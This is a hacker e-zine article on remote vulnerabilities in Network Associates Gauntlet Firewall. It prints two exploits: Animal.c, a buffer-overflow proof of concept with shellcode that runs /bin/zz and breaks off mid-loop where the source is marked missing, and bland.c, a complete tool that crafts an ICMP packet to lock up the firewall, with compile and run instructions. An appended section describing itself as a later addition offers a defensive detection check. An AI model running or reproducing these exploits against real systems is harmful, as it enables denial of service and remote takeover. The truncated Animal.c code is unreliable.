=============================================================================
--------------------------------------------------------------------------02-
-----( Gauntlet Firewall )---------------------------------------------RM-11]
-----[ Radikall ]--------------------------------------[radikal@hushmail.com]
----------------------------------------
Gauntlet Firewall Remote Buffer Overflow
Vulnerability in Network Associates
By Radikall
----------------------------------------
Vulnerable Systems:
Network Associates Gauntlet Firewall 5.5
Network Associates Gauntlet Firewall 5.0
Network Associates Gauntlet Firewall 4.2
Network Associates Gauntlet Firewall 4.1
Network Associates WebShield E-ppliance 300.0
Network Associates WebShield E-ppliance 100.0
Network Associates WebShield for Solaris 4.0
About the Bug:
A buffer overflow exists in the version of NAI's Cyber Patrol software that is
integrated into the NAI Gauntlet firewall, versions 4.1, 4.2, 5.0 and 5.5.
Because of the way Cyber Patrol was integrated, a vulnerability was introduced
that could allow a hacker remote root access on the firewall, or let them
execute arbitrary commands on the firewall.
By default, Cyber Patrol is installed when you install the Gauntlet Firewall,
and it runs for 30 days. After this period it is disabled. During this 30-day
period the firewall is susceptible to attack, since the filtering software is
externally accessible; users on the internal network may also be able to
exploit the vulnerability.
Exploit Information:
The exploit is written to run a test file called /bin/zz. Create a zz file in
/bin on the Gauntlet firewall and chmod it to 700. The zz file should contain
a logging action, which will look like the following:
---
#!/bin/sh
echo "IT RAN" > /tmp/TEST
---
The Exploit:
------------------------- Animal.c begins ------------------------------
/*
* Animal.c
*
*
* Remote Gauntlet BSDI proof of concept exploit.
* Garrison technologies may have found it, but I am the
* one who released it. ;) I do not have a Sparc or I would
* write up the Solaris one too. If you have one, please
* make the changes needed and post it. Thanks.
*
* Script kiddies can go away, this will only execute a file
* named /bin/zz on the remote firewall. To test this code,
* make a file named /bin/zz and chmod it to 700.
* I suggest for the test you just have the zz file make a note
* in syslog or whatever makes you happy.
*
* This code is intended for proof of concept only.
*
*
* _Gramble_
* Hey BuBBles
*
*To use:
* # Animal | nc
8999
*/
#include
char data[364];
main() {
int i;
char shelloutput[80];
/* just borrowed this execute code from another exploit */
unsigned char shell[] =
"\x90"
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
"\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
"\xff\xe8\xdc\xff\xff\xff/bin/zz\x00";
for(i=0;i<264;i++)
data[i]=0x90;
data[i]=0x30;i++;
data[i]=0x9b;i++;
data[i]=0xbf;i++;
data[i]=0xef;i++;
data[i] = 0x00;
for (i=0; i <
[... the rest of Animal.c and the start of bland.c are missing from the source ...]
------------------------- bland.c begins ------------------------------
* <- Send money to :-)
* aka Mike Frantzen <- Reply to
*
* Network Associates: "Who's watching your network?"
* MSG.net "Who's watching the watchers?"
*
* This can be found online at http://www.msg.net/firewalls/tis/bland.c
*
* Description:
* If you know an IP that will be routed through a Gauntlet 5.0 Firewall,
* you can remotely lock up the firewall (tested against Solaris 2.6 and
* BSDI). It locks up to the point that one packet will disable STOP-A
* (L1-A) on Sparcs and ~3-5 packets will disable Ctrl-Alt-Del on BSDI
* (Ctrl-Alt-Del still prompts Y/N but it never reboots).
*
* **You can NOT send this to the Gauntlet's IP. The packet must be one
* **that would go through the forwarding code.
*
* If you are on local ether to the firewall, set it as your default route
* or otherwise send the packet to the firewall's MAC.
*
* The packet is parsed before the packet filtering rules in Gauntlet. So
* the only known work-around is to ACL out ICMP type 12 at your screening
* router.
* Or you could switch to Gauntlet 5.5 which (in the beta) does not seem to
* be vulnerable -- but 5.5 introduces some new 'issues'.
*
*
* Technical Description of the packet:
* The packet is an ICMP Paramater Problem packet that encapsulates an IP
* packet with IP Options. There is a random protocol in the encapsulated
* IP packet. The trick is: the inner packet MUST have IP Options. Some
* options work, some don't.
* The firewall apparently is looking for the packet (or an entry in its
* transparency table) that matches the encapsulated packet. It just keeps
* looking.... It likely has interrupts masked off on Solaris.
*
*
* You need libnet to link this against. It's a pretty spiffy lib.
* http://www.infonexus.com/~daemon9/Projects/Libnet
* http://www.packetfactory.net/libnet
*
*
* For da script kiddies:
* Compile with 'gcc -o bland bland.c -lnet'
* ./bland -d
* (Did you remember to install Libnet???)
*
*
* If it doesn't compile on your machine: I DON'T CARE!!! This program was
* a quick and dirty hack. You try reading a hexdump of a packet off the
* wire and writing something that can reproduce it.
* I know it compiles and works from FreeBSD 3.1
*
*
* Network Associates (TIS) was notified two weeks ago and they are working
* on a patch.
*
*
* Plugs:
* ISIC -- Program I used (and wrote) to find bugs in Gauntlet's IP stack.
* http://expert.cc.purdue.edu/~frantzen/isic-0.02.tar.gz
* Libnet -- Was able to write the basic exploit in 20 minutes because of
* libnet. See libnet link above. Thanks go out to Route!
*
*
* Credits:
* Mike Frantzen Hey, that's me!
* Mike Scher
* Kevin Kadow <- Gauntlet Random Seed Hole
* Lenard Lynch
* Viki Navratilova
*/
#include
int main(int argc, char **argv)
{
u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0;
u_long *problem = NULL;
u_char *packet = NULL;
int sock, c, len = 0;
long acx, count = 1;
struct icmp *icmp;
struct ip *ip;
/* It appears that most IP options of length >0 will work
* Works with 128, 64, 32, 16... And the normal ones 137...
* Does not work with 0, 1 */
u_char data[] = {137};
int data_len = sizeof(data);
printf("Written by Mike Frantzen... \n");
printf("For test purposes only... yada yada yada...\n");
src_ip = inet_addr("10.10.10.10");
while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) {
switch(c) {
case 'd': dst_ip = libnet_name_resolve(optarg, 1);
break;
case 's': src_ip = libnet_name_resolve(optarg, 1);
break;
case 'D': ins_dst_ip = name_resolve(optarg, 1);
break;
case 'S': ins_src_ip = name_resolve(optarg, 1);
break;
case 'l': data_len = atoi(optarg);
break;
case 'c': if ( (count = atol(optarg)) < 1)
count = 1;
break;
default: printf("Don't understand option.\n");
exit(-1);
}
}
if ( dst_ip == 0 ) {
printf("Usage: %s\t -d \t[-s ]\n",
rindex(argv[0], '/') == NULL ? argv[0]
: rindex(argv[0], '/') + 1);
printf("\t\t[-S ]\t[-D ]\n");
printf("\t\t[-l ]\t[-c <# to send>]\n");
exit(-1);
}
if ( ins_dst_ip == 0 )
ins_dst_ip = src_ip;
if ( ins_src_ip == 0 )
ins_src_ip = dst_ip;
if ( (packet = malloc(1500)) == NULL ) {
perror("malloc: ");
exit(-1);
}
if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) {
perror("socket: ");
exit(-1);
}
/* 8 is the length of the ICMP header with the problem field */
len = 8 + IP_H + data_len;
bzero(packet + IP_H, len);
libnet_build_ip(len, /* Size of the payload */
0xc2, /* IP tos */
30241, /* IP ID */
0, /* Frag Offset & Flags */
64, /* TTL */
IPPROTO_ICMP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload */
0,
packet); /* Packet memory */
/* ICMP Header for Parameter Problem
* --------------+---------------+---------------+---------------
*| Type (12) | Code (0) | Checksum |
* --------------+---------------+---------------+---------------
*| Pointer | unused |
* --------------+---------------+---------------+---------------
* Internet Header + 64 bits of original datagram data....
*/
icmp = (struct icmp *) (packet + IP_H);
problem = (u_long *) (packet + IP_H + 4); /* 4 = ICMP header */
icmp->icmp_type = ICMP_PARAMPROB;
icmp->icmp_code = 0; /* Indicates a problem pointer */
*problem = htonl(0x14000000); /* Problem is 20 bytes into it */
/* Need to embed an IP packet within the ICMP */
ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header */
ip->ip_v = 0x4; /* IPV4 */
ip->ip_hl = 0xf; /* Some IP Options */
ip->ip_tos = 0xa3; /* Whatever */
ip->ip_len = htons(data_len); /* Length of packet */
ip->ip_id = 30241; /* Whatever */
ip->ip_off = 0; /* No frag's */
ip->ip_ttl = 32; /* Whatever */
ip->ip_p = 98; /* Random protocol */
ip->ip_sum = 0; /* Will calc later */
ip->ip_src.s_addr = ins_src_ip;
ip->ip_dst.s_addr = ins_dst_ip;
/* Move our data block into the packet */
bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len);
/* I hate checksumming. Spent a day trying to get it to work in
* perl... That sucked... Tequila would have helped immensely.
*/
libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len);
/* Bah... See above comment.... */
libnet_do_checksum(packet, IPPROTO_ICMP, len);
printf("Sending %li packets", count);
for (acx = 0; acx < count; acx++) {
if( libnet_write_ip(sock, packet, len + IP_H) < (len + IP_H))
perror("write_ip: ");
else printf(".");
}
printf("\n\n");
return( 0 );
}
------------------------- bland.c ends -----------------------------
End
That has been everything about the Gauntlet Firewall vulnerabilities.
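As an added defensive example (not part of the original article and not code from bland.c or its author): a small C check for the packet shape the bland.c comment describes, an ICMP Parameter Problem (type 12) whose quoted IP header carries IP options. The sample packet bytes, offsets and function names are constructed for this example; checksums are left at zero because the check does not depend on them.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#define ICMP_PARAMPROB_TYPE 12   /* ICMP Parameter Problem */

/* Returns 1 when pkt is an IPv4 ICMP Parameter Problem whose quoted (inner)
 * IP header has options, the shape bland.c builds; 0 otherwise. pkt points
 * at the outer IP header (no link-layer header). */
int is_paramprob_with_inner_options(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return 0;                               /* not an IPv4 header */
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 8 || pkt[9] != 1)
        return 0;                               /* no room for ICMP, or not ICMP */
    const uint8_t *icmp = pkt + ihl;
    if (icmp[0] != ICMP_PARAMPROB_TYPE)
        return 0;                               /* other ICMP types are fine */
    if (len < ihl + 8 + 20)
        return 0;                               /* quoted datagram truncated */
    const uint8_t *inner = icmp + 8;            /* after type,code,cksum,pointer */
    if ((inner[0] >> 4) != 4) return 0;         /* quoted header not IPv4 */
    size_t inner_ihl = (size_t)(inner[0] & 0x0f) * 4;
    return inner_ihl > 20;                      /* IHL > 5 means IP options */
}

/* Constructed sample, not a capture: outer IPv4 (IHL 5, proto ICMP),
 * ICMP type 12 code 0 with pointer 20, then an inner IPv4 header whose
 * IHL is 15 (0x4f), as bland.c sets ip_hl = 0xf. Checksums are zero. */
static const uint8_t SAMPLE_TRIGGER[] = {
    0x45, 0xc2, 0x00, 0x30, 0x76, 0x21, 0x00, 0x00, 0x40, 0x01, 0x00, 0x00,
    10, 10, 10, 10,  192, 0, 2, 1,                  /* outer src, dst */
    12, 0, 0x00, 0x00,  0x14, 0x00, 0x00, 0x00,     /* ICMP hdr + pointer */
    0x4f, 0xa3, 0x00, 0x01, 0x76, 0x21, 0x00, 0x00, 0x20, 0x62, 0x00, 0x00,
    192, 0, 2, 1,  10, 10, 10, 10,                  /* inner src, dst */
};
int check_trigger_sample(void)
{
    return is_paramprob_with_inner_options(SAMPLE_TRIGGER, sizeof SAMPLE_TRIGGER);
}

/* Same packet with the inner IHL set back to 5: an ordinary Parameter
 * Problem report, which the check must leave alone. */
int check_benign_sample(void)
{
    uint8_t buf[sizeof SAMPLE_TRIGGER];
    memcpy(buf, SAMPLE_TRIGGER, sizeof buf);
    buf[28] = 0x45;                                 /* inner IHL 5, no options */
    return is_paramprob_with_inner_options(buf, sizeof buf);
}
```

The comment's work-around drops all ICMP type 12 at the screening router; this check narrows that to the triggering shape, which is what you would want for an IDS signature or for triaging logs rather than blocking every Parameter Problem report.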
Radikall